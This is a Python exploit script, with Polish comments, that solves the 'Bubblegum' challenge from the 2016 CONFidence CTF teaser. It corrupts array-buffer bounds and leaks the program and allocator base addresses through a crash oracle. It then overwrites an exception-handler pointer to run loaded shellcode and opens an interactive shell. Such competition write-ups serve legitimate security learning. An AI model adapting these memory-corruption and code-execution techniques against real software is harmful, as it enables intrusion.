#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
  Nazwa pliku:      exploit.py
  Autor:            Mateusz Jurczyk
  Zadanie:          Bubblegum
  Zawody:           Teaser CONFidence CTF 2016
  Kategoria:        Eksploitacja niskopoziomowa
  Punktacja:        500 pkt. (bardzo trudne)
  Liczba rozwiązań: 0 z 44 drużyn (1 po czasie)
"""

import os
import sys
import struct
import socket
import telnetlib
import time

def read_until(s, text):
  buffer = ""
  while len(buffer) < len(text):
    buffer += s.recv(1)
  while buffer[-len(text):] != text:
    buffer += s.recv(1)
  return buffer[:-len(text)]

def db(x):
  return struct.pack("B", x)

def dd(x):
  return struct.pack("<I", x)

def create_supplied_compact_array(s, tag, elems, width, data):
  s.sendall("1\n")
  s.sendall((dd(tag) + db(elems) + db(width) + data).encode("hex") + "\n")
  s.recv(4096)

def create_empty_compact_array(s, tag):
  s.sendall("2\n")
  s.sendall("%d\n" % tag)
  s.recv(4096)

def push_element_to_compact_array(s, tag, value):
  s.sendall("3\n")
  s.sendall("%d\n%d\n" % (tag, value))
  s.recv(4096)

def set_element_at_offset(s, tag, index, value):
  s.sendall("5\n")
  s.sendall("%d\n%d\n%d\n" % (tag, index, value))
  s.recv(4096)

def set_compact_array_item_range(s, tag, start_idx, end_idx, value):
  s.sendall("6\n")
  s.sendall("%d\n%d\n%d\n%d\n" % (tag, start_idx, end_idx, value))
  s.recv(4096)

def print_array(s, tag):
  s.sendall("7\n")
  s.sendall("%d\n" % tag)
  s.recv(4096)

def remove_compact_array(s, tag):
  s.sendall("9\n")
  s.sendall("%d\n" % tag)
  s.recv(4096)

def main():
  print "---------- FAZA PIERWSZA: Ujawnij pierwszy bajt adresu bazowego programu."

  # Połącz się z usługą.
  s = socket.socket()
  s.connect(("127.0.0.1", 4141))

  # Utwórz ogromną tablicę o identyfikatorze 0x42000000, która zostanie użyta do
  # ujawnienia najbardziej znaczącego bajtu adresu bazowego programu.
  #
  # Identyfikator jest zaprojektowany tak, by minimalny indeks obiektu SafeBuffer
  # utworzony przez jego 3 dolne bajty miał postać 0x000000XX, gdzie XX jest
  # ujawnianym bajtem. Jego duży rozmiar służy temu, by podczas testowania
  # wartości XX przy użyciu operacji 5. ("set") nie nadpisać przypadkowo żadnych
  # istotnych struktur w regionie dedykowanego alokatora.
  create_supplied_compact_array(s, tag = 0x42000000, elems = 255, width = 4, data = "\xaa\xbb\xcc\xdd" * 255)

  # Utwórz tablicę z dziesięcioma bajtami 0x03, które zostaną później użyte
  # ponownie jako szerokość elementu nowej tablicy.
  create_supplied_compact_array(s, tag = 0, elems = 10, width = 1, data = "\x03" * 10)

  # Zwolnij tymczasową tablicę #0.
  remove_compact_array(s, tag = 0)

  # Utwórz dwie puste tablice. Druga z nich przyjmie szerokość elementu równą 3.
  create_empty_compact_array(s, tag = 0)
  create_empty_compact_array(s, tag = 0)

  # Usuń pierwszą tablicę, pozostawiając tylko tę z szerokością 3.
  remove_compact_array(s, tag = 0)

  # Dodaj dwa elementy na koniec tablicy #0.
  push_element_to_compact_array(s, tag = 0, value = 1)
  push_element_to_compact_array(s, tag = 0, value = 2)

  # Utwórz nową, pustą tablicę #1.
  create_empty_compact_array(s, tag = 1)

  # Dodaj 8-bitowy element na koniec tablicy #1.
  push_element_to_compact_array(s, tag = 1, value = 0x11)

  # Wykonaj operację "memset" na tablicy #0, przekazując indeksy 0 i 1, które
  # spowodują nadpisanie nagłówka obiektu SafeBuffer.
  #
  # Przypisanie trzybajtowej wartości 0xaabbcc do struktury
  # [min. indeks, maks. indeks] będzie miało następującą postać:
  #
  # [0xbbccaabb, 0xaabbccaa]
  #
  # Z tego powodu użyjemy wartości 0x7f80ff, która poskutkuje następującymi
  # limitami:
  #  - min. indeks = 0x80ff7f80 (-2130739328, bardzo mała liczba ujemna)
  #  - upper_bound = 0x7f80ff7f (2139160447, bardzo duża liczba dodatnia)
  #
  # Dzięki temu otrzymujemy możliwość wykonywania prawie dowolnych zapisów
  # relatywnych w pamięci.
  set_compact_array_item_range(s, tag = 0, start_idx = 0, end_idx = 1, value = 0x7f80ff)

  # Utwórz nową tablicę #2, której wskaźnik SafeBuffer* zostanie nadpisany tak,
  # by częściowo wskazywał na adres bazowy programu, który próbujemy ujawnić.
  create_supplied_compact_array(s, tag = 2, elems = 1, width = 1, data = "\xcc")

  # Tablica #2 znajduje się pod adresem 0x????0424, a SafeBuffer tablicy #1,
  # którego możemy używać do kontrolowanych zapisów, pod adresem 0x????044e.
  # Przekierowujemy SafeBuffer tablicy #2 na 0x????0003, czyli lokalizację
  # ostatniego bajtu adresu bazowego.
  set_element_at_offset(s, tag = 1, index = (0x0424 + 8) - (0x044e + 8), value = 0x03)
  set_element_at_offset(s, tag = 1, index = (0x0424 + 8 + 1) - (0x044e + 8), value = 0x00)

  # Próbujemy ustawiać bajty na malejących przesunięciach 254 => 0 używając
  # tablicy #2 z nadpisanym wskaźnikiem SafeBuffer*, którego min. indeks jest
  # równy z najbardziej znaczącym bajtem adresu bazowego programu. Kiedy
  # połączenie zostanie zerwane, wiemy, że ostatnio przetestowane przesunięcie
  # było mniejsze od ujawnianego bajtu, dzięki czemu poznajemy jego dokładną
  # wartość. Jeśli połączenie nie zostanie nigdy zerwane, ujawniany bajt jest
  # równy 0.
  tested_byte = 0xfe
  try:
    while tested_byte >= 0:
      sys.stdout.write("[+] Testuje bajt %.2x\r" % tested_byte)
      
      # Spróbuj ustawić wartość pod testowanym przesunięciem.
      set_element_at_offset(s, tag = 2, index = tested_byte, value = 0x22)
      
      # Sprowokuj wypisanie danych przez program.
      print_array(s, tag = 1)

      # Odczekaj krótką chwilę.
      time.sleep(0.01)

      # Odczytaj dane z gniazda. Jeśli nie ma żadnych danych, połączenie
      # zostało zerwane.
      data = s.recv(4096)
      if len(data) == 0:
        raise Exception("no data")

      tested_byte -= 1
  except:
    disclosed_byte_1 = tested_byte + 1
  else:
    disclosed_byte_1 = 0

  # Wypisz ujawniony bajt i zamknij połączenie.
  print "\n[+] Ujawniony bajt: %.2x" % disclosed_byte_1
  s.close()

  print "---------- FAZA DRUGA: Ujawnij drugi bajt adresu bazowego programu."

  # Połącz się z usługą.
  s = socket.socket()
  s.connect(("127.0.0.1", 4141))

  # Utwórz ogromną tablicę o identyfikatorze 0x42000000, która zostanie użyta do
  # ujawnienia najbardziej znaczącego bajtu adresu bazowego programu.
  #
  # Identyfikator jest zaprojektowany tak, by minimalny indeks obiektu SafeBuffer
  # utworzony przez jego 2 dolne bajty miał postać 0x0000YYXX, gdzie YY jest
  # równe 0 (nadpisany najbardziej znaczący bajt adresu bazowego), a XX jest
  # ujawnianym bajtem. Jego duży rozmiar służy temu, by podczas testowania
  # wartości XX przy użyciu operacji 5. ("set") nie nadpisać przypadkowo żadnych
  # istotnych struktur w regionie dedykowanego alokatora.
  create_supplied_compact_array(s, tag = 0x42000000, elems = 255, width = 4, data = "\xaa\xbb\xcc\xdd" * 255)

  # Utwórz tablicę z dziesięcioma bajtami 0x03, które zostaną później użyte
  # ponownie jako szerokość elementu nowej tablicy.
  create_supplied_compact_array(s, tag = 0, elems = 10, width = 1, data = "\x03" * 10)

  # Zwolnij tymczasową tablicę #0.
  remove_compact_array(s, tag = 0)

  # Utwórz dwie puste tablice. Druga z nich przyjmie szerokość elementu równą 3.
  create_empty_compact_array(s, tag = 0)
  create_empty_compact_array(s, tag = 0)

  # Usuń pierwszą tablicę, pozostawiając tylko tę z szerokością 3.
  remove_compact_array(s, tag = 0)

  # Dodaj dwa elementy na koniec tablicy #0.
  push_element_to_compact_array(s, tag = 0, value = 1)
  push_element_to_compact_array(s, tag = 0, value = 2)

  # Utwórz nową, pustą tablicę #1.
  create_empty_compact_array(s, tag = 1)

  # Dodaj 8-bitowy element na koniec tablicy #1.
  push_element_to_compact_array(s, tag = 1, value = 0x11)

  # Wykonaj operację "memset" na tablicy #0, przekazując indeksy 0 i 1, które
  # spowodują nadpisanie nagłówka obiektu SafeBuffer.
  #
  # Przypisanie trzybajtowej wartości 0xaabbcc do struktury
  # [min. indeks, maks. indeks] będzie miało następującą postać:
  #
  # [0xbbccaabb, 0xaabbccaa]
  #
  # Z tego powodu użyjemy wartości 0x7f80ff, która poskutkuje następującymi
  # limitami:
  #  - min. indeks = 0x80ff7f80 (-2130739328, bardzo mała liczba ujemna)
  #  - upper_bound = 0x7f80ff7f (2139160447, bardzo duża liczba dodatnia)
  #
  # Dzięki temu otrzymujemy możliwość wykonywania prawie dowolnych zapisów
  # relatywnych w pamięci.
  set_compact_array_item_range(s, tag = 0, start_idx = 0, end_idx = 1, value = 0x7f80ff)

  # Utwórz nową tablicę #2, której wskaźnik SafeBuffer* zostanie nadpisany tak,
  # by częściowo wskazywał na adres bazowy programu, który próbujemy ujawnić.
  create_supplied_compact_array(s, tag = 2, elems = 1, width = 1, data = "\xcc")

  # Tablica #2 znajduje się pod adresem 0x????0424, a SafeBuffer tablicy #1,
  # którego możemy używać do kontrolowanych zapisów, pod adresem 0x????044e.
  # Przekierowujemy SafeBuffer tablicy #2 na 0x????0002, czyli lokalizację
  # drugiego od końca bajtu adresu bazowego. Nadpisujemy również ostatni bajt
  # adresu bazowego pod adresem 0x????0003 na 0x00, gdyż już go ujawniliśmy,
  # a teraz tylko by nam przeszkadzał.
  set_element_at_offset(s, tag = 1, index = 0x0003 - (0x044e + 8), value = 0x00)
  set_element_at_offset(s, tag = 1, index = (0x0424 + 8) - (0x044e + 8), value = 0x02)
  set_element_at_offset(s, tag = 1, index = (0x0424 + 8 + 1) - (0x044e + 8), value = 0x00)

  # Próbujemy ustawiać bajty na malejących przesunięciach 254 => 0 używając
  # tablicy #2 z nadpisanym wskaźnikiem SafeBuffer*, którego min. indeks jest
  # równy z najbardziej znaczącym bajtem adresu bazowego programu. Kiedy
  # połączenie zostanie zerwane, wiemy, że ostatnio przetestowane przesunięcie
  # było mniejsze od ujawnianego bajtu, dzięki czemu poznajemy jego dokładną
  # wartość. Jeśli połączenie nie zostanie nigdy zerwane, ujawniany bajt jest
  # równy 0.
  tested_byte = 0xfe
  try:
    while tested_byte >= 0:
      sys.stdout.write("[+] Testuje bajt %.2x\r" % tested_byte)

      # Spróbuj ustawić wartość pod testowanym przesunięciem.
      set_element_at_offset(s, tag = 2, index = tested_byte, value = 0x22)
      
      # Sprowokuj wypisanie danych przez program.
      print_array(s, tag = 1)

      # Odczekaj krótką chwilę.
      time.sleep(0.01)

      # Odczytaj dane z gniazda. Jeśli nie ma żadnych danych, połączenie
      # zostało zerwane.
      data = s.recv(4096)
      if len(data) == 0:
        raise Exception("no data")

      tested_byte -= 1

  except:
    disclosed_byte_2 = tested_byte + 1
  else:
    disclosed_byte_2 = 0

  # Wypisz ujawniony bajt i zamknij połączenie.
  print "\n[+] Ujawniony bajt: %.2x" % disclosed_byte_2
  s.close()

  # Wypisz w całości ujawniony adres bazowy programu.
  IMAGEBASE = (disclosed_byte_1 << 24) | (disclosed_byte_2 << 16)
  print "[+] Adres bazowy bubblegum.exe: %x" % IMAGEBASE

  print "---------- FAZA TRZECIA: Zdobadz flage."

  # Połącz się z usługą.
  s = socket.socket()
  s.connect(("127.0.0.1", 4141))

  # Utwórz tablicę z dziesięcioma bajtami 0x03, które zostaną później użyte
  # ponownie jako szerokość elementu nowej tablicy.
  create_supplied_compact_array(s, tag = 0, elems = 10, width = 1, data = "\x03" * 10)

  # Zwolnij tymczasową tablicę #0.
  remove_compact_array(s, tag = 0)

  # Utwórz dwie puste tablice. Druga z nich przyjmie szerokość elementu równą 3.
  create_empty_compact_array(s, tag = 0)
  create_empty_compact_array(s, tag = 0)

  # Usuń pierwszą tablicę, pozostawiając tylko tę z szerokością 3.
  remove_compact_array(s, tag = 0)

  # Dodaj dwa elementy na koniec tablicy #0.
  push_element_to_compact_array(s, tag = 0, value = 1)
  push_element_to_compact_array(s, tag = 0, value = 2)

  # Utwórz nową, pustą tablicę #1.
  create_empty_compact_array(s, tag = 1)

  # Dodaj 8-bitowy element na koniec tablicy #1.
  push_element_to_compact_array(s, tag = 1, value = 0x11)

  # Wykonaj operację "memset" na tablicy #0, przekazując indeksy 0 i 1, które
  # spowodują nadpisanie nagłówka obiektu SafeBuffer.
  #
  # Przypisanie trzybajtowej wartości 0xaabbcc do struktury
  # [min. indeks, maks. indeks] będzie miało następującą postać:
  #
  # [0xbbccaabb, 0xaabbccaa]
  #
  # Z tego powodu użyjemy wartości 0x7f80ff, która poskutkuje następującymi
  # limitami:
  #  - min. indeks = 0x80ff7f80 (-2130739328, bardzo mała liczba ujemna)
  #  - upper_bound = 0x7f80ff7f (2139160447, bardzo duża liczba dodatnia)
  #
  # Dzięki temu otrzymujemy możliwość wykonywania prawie dowolnych zapisów
  # relatywnych w pamięci.
  set_compact_array_item_range(s, tag = 0, start_idx = 0, end_idx = 1, value = 0x7f80ff)

  # Utwórz nową tablicę #2, której wskaźnik SafeBuffer* zostanie nadpisany tak,
  # że umożliwi odczytanie zawartości pobliskiej struktury CompactArray, i tym
  # samym ujawnienie adresu regionu alokatora.
  create_supplied_compact_array(s, tag = 2, elems = 10, width = 4, data = ("\x00" * 4 + "\x7f" * 4) * 5)

  # Utwórz nową tablicę #3, której zawartość zostanie ujawniona.
  create_supplied_compact_array(s, tag = 2, elems = 1, width = 1, data = "\xdd")

  # Tablica #2 jest teraz pod adresem 0x????0010, a jej SafeBuffer, który
  # przesuniemy w celu ujawnienia adresu regionu alokatora pod adresem
  # 0x????0047. Przesunięcie o 16 bajtów (na adres 0x????0057) powinno być
  # wystarczające, by odczytać wskaźnik SafeBuffer* w sąsiadującej alokacji
  # CompactArray.
  set_element_at_offset(s, tag = 1, index = (0x0010 + 8) - (0x003a + 8), value = 0x57)

  # Wypisz zawartość tablicy #2, co spowoduje ujawnienie wskaźnika SafeBuffer*
  # tablicy #3, wskazującego na adres 0x????0087. Na jego podstawie możemy
  # obliczyć adres bazowy alokatora wylosowany przez funkcję VirtualAlloc().
  print_array(s, tag = 2)
  read_until(s, "200000001010000")
  ALLOCBASE = struct.unpack("<I", s.recv(8).decode("hex"))[0] - 0x87

  print "[+] Ujawniony adres regionu alokatora: %x" % ALLOCBASE

  # Załaduj kod powłoki i wstaw go do nowej tablicy #4. Odpowiadający jej
  # SafeBuffer znajdzie się pod adresem 0x????00a0, więc sam kod wyląduje
  # pod 0x????00a8.
  with open("shellcode", "rb") as f:
    shellcode = f.read()

  create_supplied_compact_array(s, tag = 4, elems = len(shellcode), width = 1, data = shellcode)

  SHELLCODE_ADDR = ALLOCBASE + 0xa8

  # Nadpisz wskaźnik na funkcję obsługi wyjątków znajdujący się w pamięci
  # statycznej programu adresem kodu powłoki.
  EXCP_HANDLER_PTR_OFFSET = 0x30D7C
  set_element_at_offset(s, tag = 1, index = (IMAGEBASE + EXCP_HANDLER_PTR_OFFSET + 0) - (ALLOCBASE + 0x003a + 8), value = SHELLCODE_ADDR & 0xff)
  set_element_at_offset(s, tag = 1, index = (IMAGEBASE + EXCP_HANDLER_PTR_OFFSET + 1) - (ALLOCBASE + 0x003a + 8), value = (SHELLCODE_ADDR >> 8) & 0xff)
  set_element_at_offset(s, tag = 1, index = (IMAGEBASE + EXCP_HANDLER_PTR_OFFSET + 2) - (ALLOCBASE + 0x003a + 8), value = (SHELLCODE_ADDR >> 16) & 0xff)
  set_element_at_offset(s, tag = 1, index = (IMAGEBASE + EXCP_HANDLER_PTR_OFFSET + 3) - (ALLOCBASE + 0x003a + 8), value = (SHELLCODE_ADDR >> 24) & 0xff)

  # Odczekaj chwilę i odczytaj wszystkie pozostałe dane zanim sprowokujemy
  # wywołanie naszego kodu i odczytanie flagi.
  time.sleep(1.0)
  s.recv(4096)

  # Spowoduj wygenerowanie wyjątku, co poskutkuje wywołaniem nadpisanego
  # wskaźnika i uruchomieniem naszego kodu powłoki.
  set_element_at_offset(s, tag = 1, index = 0x80808080, value = 0x00)

  # Przejdź w tryb interaktywny.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

if __name__ == "__main__":
  main()

